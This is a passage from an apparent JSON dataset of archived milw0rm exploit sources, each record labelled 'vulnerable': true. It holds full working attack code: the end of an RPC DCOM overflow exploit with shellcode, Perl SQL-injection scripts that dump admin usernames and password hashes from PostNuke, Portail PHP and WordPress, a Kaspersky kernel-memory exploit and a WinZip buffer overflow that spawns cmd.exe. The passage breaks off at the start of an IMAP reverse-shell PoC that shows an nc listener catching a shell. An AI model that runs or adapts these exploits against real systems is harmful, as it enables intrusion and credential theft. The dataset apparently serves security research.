x72\\x90\\x12\\xD9\\xAD\\x12\\x31\\x21\\x99\\x99\"\n\n\"\\x99\\x12\\x5C\\xC7\\xC4\\x5B\\x9D\\x99\\x71\\x21\\x67\\x66\\x66\"\n\n\n\n    \"\\x6e\\x60\\x38\\xcc\\x54\\xd6\\x93\\xd7\\x93\\x93\\x93\\x1a\\xce\\xaf\\x1a\\xce\"\n\n    \"\\xab\\x1a\\xce\\xd3\\x54\\xd6\\xbf\\x92\\x92\\x93\\x93\\x1e\\xd6\\xd7\\xc3\\xc6\"\n\n    \"\\xc2\\xc2\\xc2\\xd2\\xc2\\xda\\xc2\\xc2\\xc5\\xc2\\x6c\\xc4\\x77\\x6c\\xe6\\xd7\"\n\n    \"\\x6c\\xc4\\x7b\\x6c\\xe6\\xdb\\x6c\\xc4\\x7b\\xc0\\x6c\\xc4\\x6b\\xc3\\x6c\\xc4\"\n\n    \"\\x7f\\x19\\x95\\xd5\\x17\\x53\\xe6\\x6a\"\n\n    \"\\xc2\\xc1\\xc5\\xc0\\x6c\\x41\\xc9\\xca\"\n\n    \"\\x1a\\x94\\xd4\\xd4\\xd4\\xd4\\x71\\x7a\\x50\\x90\\x90\\x90\"     //\n\n    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n    \"\\x77\\xe0\\x43\\x00\\x00\\x10\\x5c\\x00\"\n\n    \"\\xeb\\x1e\\x01\\x00\"//     FOR CN SP3/SP4+-MS03-26\n\n    \"\\x4C\\x14\\xec\\x77\"//    TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os \n\n\n\n\n\n//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form  my artic \n\n//\"Utilization of released heap structure and exploit of universal Heap overflow in windows \".\n\n\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x90\\x02\\x80\\x34\\x0A\\x99\\xE2\\xFA\"\n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"\n\n\"\\xC7\\x5F\\x9D\\xBD\\xDD\\x14\\xDD\\xBD\\xDD\\xC9\\x14\\xDD\\xBD\\x9D\\xC9\\x14\"\n\n\"\\x1D\\xBD\\x1D\\x99\\x99\\x99\\xC9\\x14\\x1D\\xBD\\x0D\\x99\\x99\\x99\\xC9\\xAA\"\n\n\"\\x59\\xC9\\xC9\\xC9\\xC9\\xCA\\x14\\x1D\\xBD\\x2D\\x99\\x99\\x99\\xC9\\x66\\xCF\"\n\n\"\\x95\\x14\\xD5\\xBD\\xDD\\x14\\x8D\\xBD\\xAA\\x59\\xC9\\xF1\\xAC\\x99\\xAE\\x99\"\n\n\"\\xF1\\xB9\\x99\\xAC\\x99\\xF1\\xEA\\x99\\xED\\x99\\xF1\\xB9\\x99\\xEA\\x99\\xF1\"\n\n\"\\xFC\\x99\\xEB\\x99\\xF1\\xEC\\x99\\xEA\\x99\\xF1\\xED\\x99\\xB9\\x99\\xF1\\xF7\"\n\n\"\\x99\\xFC\\x99\\x12\\x45\\xC8\\xCB\\xC8\\xCB\\x14\\x1D\\xBD\\x29\\x99\\x99\\x99\"\n\n\"\\xC9\\x14\\x1D\\xBD\\x59\\x99\\x99\\x99\\xC9\\xAA\\x59\\xC9\\xC9\\xC9\\xC9\\xCA\"\n\n\"\\x14\\x1D\\xBD\\x79\\x99\\x99\\x99\\xC9\\x66\\xCF\\x95\\xC3\\xC0\\xAA\\x59\\xC9\"\n\n\"\\xF1\\xFD\\x99\\xFD\\x99\\xF1\\xB6\\x99\\xF8\\x99\\xF1\\xED\\x99\\xB9\\x99\\xF1\"\n\n\"\\xEA\\x99\\xEA\\x99\\xF1\\xEA\\x99\\xB9\\x99\\xF1\\xF6\\x99\\xEB\\x99\\xF1\\xF8\"\n\n\"\\x99\\xED\\x99\\xF1\\xED\\x99\\xEB\\x99\\xF1\\xF0\\x99\\xEA\\x99\\xF1\\xF0\\x99\"\n\n\"\\xF7\\x99\\xF1\\xFD\\x99\\xF4\\x99\\xF1\\xB9\\x99\\xF8\\x99\\xF1\\xEC\\x99\\xE9\"\n\n\"\\x99\\xF1\\xEB\\x99\\xF6\\x99\\xF1\\xF5\\x99\\xFE\\x99\\xF1\\xFA\\x99\\xF8\\x99\"\n\n\"\\xF1\\xF5\\x99\\xF6\\x99\\xF1\\xED\\x99\\xB9\\x99\\xF1\\xF7\\x99\\xFC\\x99\\x12\"\n\n\"\\x45\\xC8\\xCB\\x14\\x1D\\xBD\\x61\\x99\\x99\\x99\\xC9\\x14\\x1D\\xBD\\x91\\x98\"\n\n\"\\x99\\x99\\xC9\\xAA\\x59\\xC9\\xC9\\xC9\\xC9\\xCA\\x14\\x1D\\xBD\\xB1\\x98\\x99\"\n\n\"\\x99\\xC9\\x66\\xCF\\x95\\xAA\\x59\\xC9\\x66\\xCF\\x89\\xCA\\xCC\\xCF\\xCE\\x12\"\n\n\"\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\\x9C\\xE1\\x9A\\x4C\\x12\\xD3\\x81\\x12\"\n\n\"\\xC3\\xB9\\x9A\\x44\\x7A\\xAB\\xD0\\x12\\xAD\\x12\\x9A\\x6C\\xAA\\x66\\x65\\xAA\"\n\n\"\\x59\\x35\\xA3\\x5D\\xED\\x9E\\x58\\x56\\x94\\x9A\\x61\\x72\\x6B\\xA2\\xE5\\xBD\"\n\n\"\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x9A\"\n\n\"\\x44\\x12\\x9D\\x12\\x9A\\x5C\\x72\\x9B\\xAA\\x59\\x12\\x4C\\xC6\\xC7\\xC4\\xC2\"\n\n\"\\x5B\\x9D\\x99\\xCC\\xCF\\xFD\\x38\\xA9\\x99\\x99\\x99\\x1C\\x59\\xE1\\x95\\x12\"\n\n\"\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xF1\\x91\\x72\\x90\\x12\\xD9\\xAD\\x12\\x31\"\n\n\"\\x21\\x99\\x99\\x99\\x12\\x5C\\xC7\\xC4\\x5B\\x9D\\x99\\x71\\xEC\\x64\\x66\\x66\"\n\n\n\n\"\\x04\\x04\\x00\\x70\\x00\\x04\\x40\"\n\n\"\\x00\\x10\\x5c\\x00\\x78\\x01\\x07\\x00\\x78\\x01\\x07\\x00\\xa0\\x04\\x00\"\n\n\n\n\"\\x21\\x99\\x99\\x99\\x12\\x5C\\xC7\\xC4\\x5B\\x9D\\x99\\x71\";\n\n\n\n\n\nunsigned char request4[]={\n\n0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00\n\n,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C\n\n,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n};\n\n\n\nvoid main(int argc,char ** argv)\n\n{\n\n    WSADATA WSAData;\n\n    SOCKET sock;\n\n    int len,len1;\n\n    SOCKADDR_IN addr_in;\n\n    short port=135;\n\n    unsigned char buf1[0x1000];\n\n    unsigned char buf2[0x1000];\n\n\n\n    printf(\"RPC DCOM overflow Vulnerability discoveried by NSFOCUS\\n\");\n\n    printf(\"Code by FlashSky,Flashsky xfocus org\\n\");\n\n    printf(\"Welcome to our Site: http://www.xfocus.org\\n\");\n\n    printf(\"Welcome to our Site: http://www.venustech.com.cn\\n\");\n\n    if(argc!=2)\n\n    {\n\n        printf(\"%s targetIP \\n\",argv[0]);\n\n        printf(\"for cn w2k server sp3/sp4+ms03-26\\n\");\n\n    }\n\n    \n\n    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)\n\n    {\n\n        printf(\"WSAStartup error.Error:%d\\n\",WSAGetLastError());\n\n        return;\n\n    }\n\n\n\n    addr_in.sin_family=AF_INET;\n\n    addr_in.sin_port=htons(port);\n\n    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);\n\n    \n\n    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)\n\n    {\n\n        printf(\"Socket failed.Error:%d\\n\",WSAGetLastError());\n\n        return;\n\n    }\n\n    len1=sizeof(request1);\n\n    len=sizeof(sccnsp3sp4);\n\n\n\n    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)\n\n    {\n\n        printf(\"Connect failed.Error:%d\",WSAGetLastError());\n\n        return;\n\n    }\n\n    memcpy(buf2,request1,sizeof(request1));\n\n    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2;  \n\n    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2;\n\n    memcpy(buf2+len1,request2,sizeof(request2));\n\n    len1=len1+sizeof(request2);\n\n    memcpy(buf2+len1,sccnsp3sp4,sizeof(sccnsp3sp4));\n\n    len1=len1+sizeof(sccnsp3sp4);\n\n    memcpy(buf2+len1,request3,sizeof(request3));\n\n    len1=len1+sizeof(request3);\n\n    memcpy(buf2+len1,request4,sizeof(request4));\n\n    len1=len1+sizeof(request4);\n\n    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;\n\n\n\n    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;  \n\n    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;\n\n    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;\n\n    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;\n\n    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;\n\n    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;\n\n    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;\n\n    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)\n\n    {\n\n            printf(\"Send failed.Error:%d\\n\",WSAGetLastError());\n\n            return;\n\n    }\n\n    \n\n    len=recv(sock,buf1,1000,NULL);\n\n    if (send(sock,buf2,len1,0)==SOCKET_ERROR)\n\n    {\n\n            printf(\"Send failed.Error:%d\\n\",WSAGetLastError());\n\n            return;\n\n    }\n\n//    len=recv(sock,buf1,1024,NULL);\n\n}\n\n\n\n/*\n\n\n\n*/\n\n\n\n// milw0rm.com [2003-09-20]",
175        "vulnerable": true
176    },
177    {
178        "exploit_id": 1030,
179        "content": "#!/usr/bin/perl\n\n# This tools is only for educational purpose\n\n#\n\n# K-C0d3r a x0n3-h4ck friend !!!\n\n#\n\n# This exploit should give admin nick and md5 password\n\n#\n\n#-=[ PostNuke SQL Injection                     version : x=> 0.750]=-\n\n#-=[                                                               ]=-\n\n#-=[ Discovered by sp3x                                            ]=-\n\n#-=[ Coded by K-C0d3r                                              ]=-\n\n#-=[ irc.xoned.net #x0n3-h4ck to find me   K-c0d3r[at]x0n3-h4ck.org]=-\n\n#\n\n# Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke\n\n#\n\n# !!! NOW IS PUBLIC (6-6-2005) !!!\n\n\n\nuse IO::Socket;\n\n\n\nsub Usage {\n\nprint STDERR \"Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\\n\";\n\nexit;\n\n}\n\n\n\nif (@ARGV < 2)\n\n{\n\n Usage();\n\n}\n\n\n\nif (@ARGV > 2)\n\n{\n\n Usage();\n\n}\n\n\n\nif (@ARGV == 2)\n\n{\n\n$host = @ARGV[0];\n\n$path = @ARGV[1];\n\n\n\nprint \"[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\\n\";\n\nprint \"[+] Connecting to $host\\n\";\n\n\n\n$injection = \"$host\\/$path?\";\n\n$injection .= \"op=modload&name=Messages&file=readpmsg&start=0\";\n\n$injection .= \"%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null\";\n\n$injection .= \"%20FROM%20pn_users%20WHERE%20pn_uid=2\\/*&total_messages=1\";\n\n\n\n$socket = new IO::Socket::INET (PeerAddr => \"$host\",\n\n                                PeerPort => 80,\n\n                                Proto => 'tcp');\n\n                                die unless $socket;\n\n\n\nprint \"[+] Injecting command ...\\n\";\n\nprint $socket \"GET http://$injection HTTP/1.1\\nHost: $host\\n\\n\";\n\nwhile (<$socket>)\n\n{\n\n print $_;\n\n exit;\n\n}\n\n}\n\n\n\n# milw0rm.com [2005-06-05]",
180        "vulnerable": true
181    },
182    {
183        "exploit_id": 1031,
184        "content": "#!/usr/bin/perl -w\n\n#\n\n# SQL Injection Exploit for Portail PHP < 1.3\n\n# This exploit show the username of the administrator of the portal and his password crypted in MD5\n\n# Related advisory: http://www.securityfocus.com/archive/1/398728/2005-05-21/2005-05-27/0\n\n# Coded by Alberto Trivero\n\n\n\nuse LWP::Simple;\n\n\n\nprint \"\\n\\t=================================\\n\";\n\nprint \"\\t= Exploit for Portail PHP < 1.3 =\\n\";\n\nprint \"\\t= Alberto Trivero - codebug.org =\\n\";\n\nprint \"\\t=================================\\n\\n\";\n\n\n\nif(!$ARGV[0] or !($ARGV[0]=~m/http/)) {\n\n   print \"Usage:\\nperl $0 [full_target_path]\\n\\n\";\n\n   print \"Examples:\\nperl $0 http://www.example.com/portailphp/\\n\";\n\n   exit(0);\n\n}\n\n\n\n$url=q[index.php?affiche=Liens&id=1%20UNION%20SELECT%20null,null,null,null,null,null,US_pwd,US_nom,null%20FROM%20pphp_user/*];\n\n$page=get($ARGV[0].$url) || die \"[-] Unable to retrieve: $!\";\n\nprint \"[+] Connected to: $ARGV[0]\\n\";\n\n$page=~m/0000-00-00, 0  \\)<\\/i>     <br><br><br><br><\\/td>   <\\/tr>   <tr>     <td width='100%'>(.*?)<\\/td>   <\\/tr>/ && print \"[+] Username of administrator is: $1\\n\";\n\nprint \"[-] Unable to retrieve username\\n\" if(!$1);\n\n$page=~m/<img border='0' src='\\.\\/images\\/ico_liens\\.gif' >&nbsp;<b> <\\/b>: (.*?)<\\/td>/ && print \"[+] MD5 hash of password is: $1\\n\";\n\nprint \"[-] Unable to retrieve hash of password\\n\" if(!$1);\n\n\n\n# milw0rm.com [2005-06-06]",
185        "vulnerable": true
186    },
187    {
188        "exploit_id": 1032,
189        "content": "/* Added NO_STRICT to 1 on line 2 /str0ke ! milw0rm.com */\n\n#define NO_STRICT 1\n\n#include <windows.h>\n\n\n\n#undef STRICT\n\n\n\nPUCHAR pCodeBase=(PUCHAR)0xBE9372C0;\n\n\n\nPDWORD pJmpAddress=(PDWORD)0xBE9372B0;\n\n\n\nPUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};\n\n\n\nPUCHAR pKAVRet;\n\n\n\n\n\nunsigned char code[]={0x68,0x00,0x02,0x00,0x00,\t//push 0x200\n\n\t\t\t\t\t0x68,0x00,0x80,0x93,0xBE,\t//push <buffer address> - 0xBE938000\n\n\t\t\t\t\t0x6A,0x00,\t\t\t\t\t//push 0\n\n\t\t\t\t\t0xB8,0x00,0x00,0x00,0x00,\t//mov eax,<GetModuleFileNameA> -> +13\n\n\t\t\t\t\t0xFF,0xD0,\t\t\t\t\t//call eax\n\n\t\t\t\t\t0x68,0x00,0x80,0x93,0xBE,\t//push <buffer address>\n\n\t\t\t\t\t0x68,0x00,0x82,0x93,0xBE,\t//push <address of the notepad path>- 0xBE938200\n\n\t\t\t\t\t0xB8,0x00,0x00,0x00,0x00,\t//mov eax,<lstrcmpiA> -> +30\n\n\t\t\t\t\t0xFF,0xD0,\t\t\t\t\t//call eax\n\n\t\t\t\t\t0x85,0xC0,\t\t\t\t\t//test eax,eax\n\n\t\t\t\t\t0x74,0x03,\t\t\t\t\t//je +03\n\n\t\t\t\t\t0xC2,0x04,0x00,\t\t\t\t//retn 4\n\n\t\t\t\t\t0x6A,0x00,\t\t\t\t\t//push 0\n\n\t\t\t\t\t0x68,0x00,0x84,0x93,0xBE,\t//push <address of the message string>- 0xBE938400\n\n\t\t\t\t\t0x68,0x00,0x84,0x93,0xBE,\t//push <address of the message string>- 0xBE938400\n\n\t\t\t\t\t0x6A,0x00,\t\t\t\t\t//push 0\n\n\t\t\t\t\t0xB8,0x00,0x00,0x00,0x00,\t//mov eax,<MessageBoxA> -> +58\n\n\t\t\t\t\t0xFF,0xD0,\t\t\t\t\t//call eax\n\n\t\t\t\t\t0xC2,0x04,0x00\t\t\t\t//retn 4\n\n\t\t\t\t\t};\n\n\n\nunsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt [0xBE9372B0]\n\n\n\n//////////////////////////////////////////////////////////////\n\n\n\nBOOLEAN LoadExploitIntoKernelMemory(void){\n\n\n\n\n\n\n\n//Get function's addresses\n\n\n\n\tHANDLE hKernel=GetModuleHandle(\"KERNEL32.DLL\");\n\n\tHANDLE hUser=GetModuleHandle(\"USER32.DLL\");\n\n\n\n\tFARPROC pGetModuleFileNameA=GetProcAddress(hKernel,\"GetModuleFileNameA\");\n\n\tFARPROC plstrcmpiA=GetProcAddress(hKernel,\"lstrcmpiA\");\n\n\n\n\tFARPROC pMessageBoxA=GetProcAddress(hUser,\"MessageBoxA\");\n\n\n\n\t*(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;\n\n\t*(DWORD*)(code+30)=(DWORD)plstrcmpiA;\n\n\t*(DWORD*)(code+58)=(DWORD)pMessageBoxA;\n\n\n\n//Prepare our data into ring0-zone.\n\n\n\n\tPCHAR pNotepadName=(PCHAR)0xBE938200;\n\n\n\n\tchar temp_buffer[MAX_PATH];\n\n\tchar *s;\n\n\n\n\tSearchPath(NULL,\"NOTEPAD\",\".EXE\",sizeof(temp_buffer),temp_buffer,&s);\n\n\n\n\tlstrcpy(pNotepadName,temp_buffer);\n\n\n\n\tPCHAR pMessage=(PCHAR)0xBE938400;\n\n\n\n\tlstrcpy(pMessage,\"Notepad is running!!! KAV is vulnerable!!!\");\n\n\n\n\tmemmove(pCodeBase,code,sizeof(code));\n\n\n\n\t*pJmpAddress=(DWORD)pCodeBase;\n\n\n\n\tmemmove(pKAVRet,jmp_code,sizeof(jmp_code));\n\n\n\n\treturn TRUE;\n\n}\n\n\n\n///////////////////////////////////////////////////////////////\n\n\n\nvoid UnloadExploitFromKernelMemory(){\n\n\n\n\tUCHAR retn_4[]={0xC2,0x04,0x00};\n\n\n\n\tmemmove(pKAVRet,retn_4,sizeof(retn_4));\n\n\n\n}\n\n\n\n/////////////////////////////////////////////////////////////////\n\n\n\nPUCHAR GetKAVRetAddress(void){\n\n\n\n//Check the retn 4 in the KAV 0xBE9334E1 function end\n\n//Also, we check the KAV klif.sys existance.\n\n\n\n\tUCHAR retn_4[]={0xC2,0x04,0x00};\n\n\n\n\t__try{\n\n\n\n\t\tfor(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){\n\n\n\n\t\t\tif(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0)\n\n\t\t\t\treturn pKAVRets[i];\n\n\n\n\t\t}\n\n\n\n\t}__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,\"KAV is not installed\",NULL,0);return NULL;}\n\n\n\n\n\n\tMessageBox(NULL,\"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of KAV\",NULL,0);\n\n\treturn NULL;\n\n}\n\n\n\n/////////////////////////////////////////////////////////////////\n\n\n\nvoid main(void){\n\n\n\n\tpKAVRet=GetKAVRetAddress();\n\n\n\n\tif(NULL==pKAVRet)\n\n\t\treturn;\n\n\n\n\n\n\tif(!LoadExploitIntoKernelMemory())\n\n\t\treturn;\n\n\n\n\tchar temp_buffer[MAX_PATH];\n\n\tchar *s;\n\n\n\n\tSearchPath(NULL,\"NOTEPAD\",\".EXE\",sizeof(temp_buffer),temp_buffer,&s);\n\n\n\n\tPROCESS_INFORMATION pi;\n\n\n\n\tSTARTUPINFO si={0};\n\n\tsi.cb=sizeof(si);\n\n\n\n\tCreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,\n\n\t\t\t\t\t\t0,NULL,NULL,&si,&pi);\n\n\n\n\tWaitForSingleObject(pi.hProcess,INFINITE);\n\n\n\n\tMessageBox(NULL,\"Now you may start your own Notepad instance to check this exploit!\",\"KAV_EXPLOITER\",0);\n\n\n\n\tMessageBox(NULL,\"Close this window to stop exploitation\",\"KAV_EXPLOITER\",0);\n\n\n\n\tUnloadExploitFromKernelMemory();\n\n}\n\n\n\n// milw0rm.com [2005-06-07]",
190        "vulnerable": true
191    },
192    {
193        "exploit_id": 1033,
194        "content": "#!/usr/bin/perl -w\n\n#\n\n# SQL Injection Exploit for WordPress <= 1.5.1.1\n\n# This exploit shows the username of the administrator of the blog and his\n\n# password crypted in MD5, you must only choose the correct version of the target\n\n# Related advisory: http://www.gentoo.org/security/en/glsa/glsa-200506-04.xml\n\n# Patch: download the last version at http://wordpress.org/download/\n\n# Coded by Alberto Trivero\n\n\n\nuse LWP::Simple;\n\n\n\nprint \"\\n\\t====================================\\n\";\n\nprint \"\\t= Exploit for WordPress <= 1.5.1.1 =\\n\";\n\nprint \"\\t=        by Alberto Trivero        =\\n\";\n\nprint \"\\t====================================\\n\\n\";\n\n\n\nif(!$ARGV[0] or !($ARGV[0]=~m/http/) or !($ARGV[1]==1 or $ARGV[1]==2)) {\n\n   print \"Usage:\\nperl $0 [full_target_path] [target_version: 1 OR 2]\\nVersion 1: WordPress <= 1.5\\nVersion 2: WordPress 1.5.1 - 1.5.1.1\\n\\n\";\n\n   print \"Examples:\\nperl $0 http://www.example.com/wordpress/ 2\\n\";\n\n   exit(0);\n\n}\n\n\n\n$page=get($ARGV[0].\"index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*\") || die \"[-] Unable to retrieve: $!\" if($ARGV[1]==1);\n\n$page=get($ARGV[0].\"index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*\") || die \"[-] Unable to retrieve: $!\" if($ARGV[1]==2);\n\nprint \"[+] Connected to: $ARGV[0]\\n\";\n\n$page=~m/:([a-f0-9]{32}):(.*?):/;\n\nprint \"[+] Username of administrator is: $2\\n\" if($2);\n\nprint \"[+] MD5 hash of password is: $1\\n\" if($1);\n\nprint \"[-] Unable to retrieve username\\n\" if(!$2);\n\nprint \"[-] Unable to retrieve hash of password\\n\" if(!$1);\n\n\n\n# milw0rm.com [2005-06-22]",
195        "vulnerable": true
196    },
197    {
198        "exploit_id": 1034,
199        "content": "/*\n\n*\n\n* WinZip Command Line Local Buffer Overflow\n\n* http://securitytracker.com/alerts/2004/Sep/1011132.html\n\n* http://www.winzip.com/wz90sr1.htm\n\n* Exploit coded By ATmaCA\n\n* Web: atmacasoft.com && spyinstructors.com\n\n* E-Mail: atmaca@icqmail.com\n\n* Credit to kozan\n\n*\n\n*/\n\n\n\n/*\n\n*\n\n* Tested with WinZip 8.1 on Win XP Sp2 En\n\n* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)\n\n* http://www.winzip.com/wz90sr1.htm\n\n*\n\n*/\n\n\n\n#include <windows.h>\n\n#include <stdio.h>\n\n\n\n#define NOP 0x90\n\n\n\nvoid main()\n\n{\n\n        // create crafted command line\n\n        char tmpfile[] = \"c:\\\\wzs45.tmp\";\n\n        char winzippath[] = \"C:\\\\Program Files\\\\WINZIP\\\\winzip32.exe\";\n\n        char zipandmailpar[] = \" -* /zipandmail /@  \";\n\n        char runpar[300];\n\n        int i = 0;\n\n        strcpy(runpar,winzippath);\n\n        strcat(runpar,zipandmailpar);\n\n        strcat(runpar,tmpfile);\n\n\n\n        // need for some input file name .tmp but not must to exist\n\n        char inputfile[] = \"C:\\\\someinputfile.ext\\n\";\n\n\n\n        // launch a local cmd.exe\n\n        char shellcode[] =\n\n        \"\\x55\\x8B\\xEC\\x33\\xFF\"\n\n        \"\\x57\\x83\\xEC\\x04\\xC6\\x45\\xF8\"\n\n        \"\\x63\\xC6\\x45\\xF9\\x6D\\xC6\\x45\"\n\n        \"\\xFA\\x64\\xC6\\x45\\xFB\\x2E\\xC6\"\n\n        \"\\x45\\xFC\\x65\\xC6\\x45\\xFD\\x78\"\n\n        \"\\xC6\\x45\\xFE\\x65\\xB8\"\n\n        \"\\xC7\\x93\\xC2\\x77\" //77C293C7 system() - WinXP SP2 - msvcrt.dll\n\n        \"\\x50\\x8D\\x45\\xF8\\x50\"\n\n        \"\\xFF\\x55\\xF4\";\n\n\n\n        // create crafted .tmp file\n\n        FILE *di;\n\n        if( (di=fopen(tmpfile,\"wb\")) == NULL ){\n\n                return;\n\n        }\n\n\n\n        for(i=0;i<sizeof(inputfile)-1;i++)\n\n                fputc(inputfile[i],di);\n\n\n\n        fprintf(di,\"c:\\\\\");\n\n\n\n        for(i=0;i<384;i++)\n\n                fputc(NOP,di);\n\n\n\n\n\n        for(i=0;i<sizeof(shellcode)-1;i++)\n\n                fputc(shellcode[i],di);\n\n\n\n        fprintf(di,\"\\xBF\\xAC\\xDA\\x77\");  //EIP - WinXp Sp2 Eng - jmp esp addr\n\n        fprintf(di,\"\\x90\\x90\\x90\\x90\");  //NOPs\n\n        fprintf(di,\"\\x90\\x83\\xEC\\x74\");  //sub esp,0x74\n\n        fprintf(di,\"\\xFF\\xE4\\x90\\x90\");  //jmp esp\n\n\n\n        fprintf(di,\"\\n\");\n\n\n\n        fclose(di);\n\n        WinExec(runpar,SW_SHOW);\n\n}\n\n\n\n// milw0rm.com [2005-06-07]",
200        "vulnerable": true
201    },
202    {
203        "exploit_id": 1035,
204        "content": "/* \n\nIpSwitch IMAP Server LOGON stack overflow.\n\nSoftware Hole discovered by iDEFENSE\n\nPOC written by nolimit and BuzzDee \n\n\n\nFirst, some information for the few of you that know how this stuff works.\n\nThe reason you see no SP2 or 2003 offsets is because of Windows SEH checks. \n\nThats right, in this one situation, They've stopped hackers from exploiting the machine. \n\nAt least with as much research as I care to do. The problem lies in the\n\nfact that only alpha numeric memory addresses can be used in this exploit.\n\nSo what lies within the few regions of memory that is alpha numeric safe? Only system\n\nDLLs.(Well also a 7000 byte TEB block section, which doesn't really produce much either).\n\nSo any SEH address overwritten that points to a system DLL  will fail past Windows XP SP2.\n\nFrom what I've read and the few tricks I've tried, Theirs no way currently to get around the\n\nprotection In my situation. \n\n\n\nFor the sharp ones, you've maybe noticed that XP SP1 isn't an offset. This is because \n\nof two reasons, While I've developed along with skylined an alpha numeric shellcode\n\nto handle the stack protections in Windows XP/2K3, I don't think he's ready to release\n\nit yet.So, when It does come around, you can use that and re-adjust the stack accordingly\n\nfor proper exploitation of SP1. \n\n\n\nThe size we have on the stack is too small for a bindshell, but big enough for a reverse shell!\n\nSo I use ALPHA2's decoder and encoder (modified) to write info to reverse shell, then encode it.\n\nvisit http://www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php for more information.\n\n\n\nNow, for the \"impact assessment\".\n\nBecause this doesn't work on SP2 / 2003, the 53 million users that use Imail should\n\nmostly be safe from complete ownage. But, Do not let this fact let you not patch your\n\nserver! This exploit, sent with any offset, will still crash your IMAP server!\n\nWith that said, Thier is still a small amount of servers online that run one of these\n\ntargetted offsets, and therefore can be exploited. I hope this Proof Of Concept is the\n\npush administrators need to patch their software.\n\n\n\nFor Da Skiddies: this exploit is teh oww kay. I g0t a f3w shells0rs.\n\n\n\n  C:\\HACKING\\tools>nc -vv -l -p 3333\n\n\tlistening on [any] 3333 ...\n\n\tDNS fwd/rev mismatch: 2kvm != 2kvm.launchmodem.com\n\n\tconnect to [192.168.1.95] from 2kvm [192.168.1.93] 1078\n\n\tMicrosoft Windows 2000 [Version 5.00.2195]\n\n\t(C) Copyright 1985-2000 Microsoft Corp.\n\n\t\n\n\tC:\\WINNT\\system32>_\n\n\n\nQuestions? Comments?  \n\n  nolimit@coreiso.org\n\n  \n\n\n\n                             -  - ---.\n\n             .----------------------. |                      \u00b7\n\n             | :::::::::''''':::::: | !                   \u00b7 /\n\n             l  '''''           '': | `                  /_/\n\n     .--- --\u00b7X\u00b7----------- -- -  -  | - c o r e i s o   __ \\  \u00b7   -  - ---.\n\n     |       !                      :                  /_/\\ \\/            |\n\n             |                                        _\\ \\ \\              |\n\n  S! /\\____  |  _ ______/\\ __ ______/\\ __ ______/\\   / /\\_\\/ _______ /\\______\n\n   _/    _/_____\\    _    \\__    _    \\__    _    \\_/ /  \\ _/  ____//   _    \\_\n\n  //    /     _      /     /    _/     /     /     / /   / \\_____      |/     /\n\n_/     /      /     /    _/     \\    _/\\    ______/\\/   /:     |/      /     /|\n\n\\ ___________/\\ _________\\ _____|\\______\\ __________\\  /||     _______________|\n\n \\/  .       . \\/         \\/        .    \\/     /_/   / |______\\          .\n\n     |       |                      .          _\\ \\  /                    |\n\n     |       |                      l         /_/\\_\\/                     |\n\n     `------ | ------- -- -   - ---\u00b7X\u00b7-- -  -_\\ \\ \\       -   -  - -- ----'\n\n           . | :.            .....  !.      / /\\_\\/\n\n           : | :::::......::::::::: |:     / /. \\\n\n           | `----------------------'|    /_//  /    www.coreiso.org\n\n           `--- -  -                 |    \\ \\  /     Innovation, not imitation.\n\n                             -  - ---'     \\_\\/\n\n\n\n*/\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <winsock.h>\n\n#pragma comment(lib,\"ws2_32\")\n\n\n\nvoid 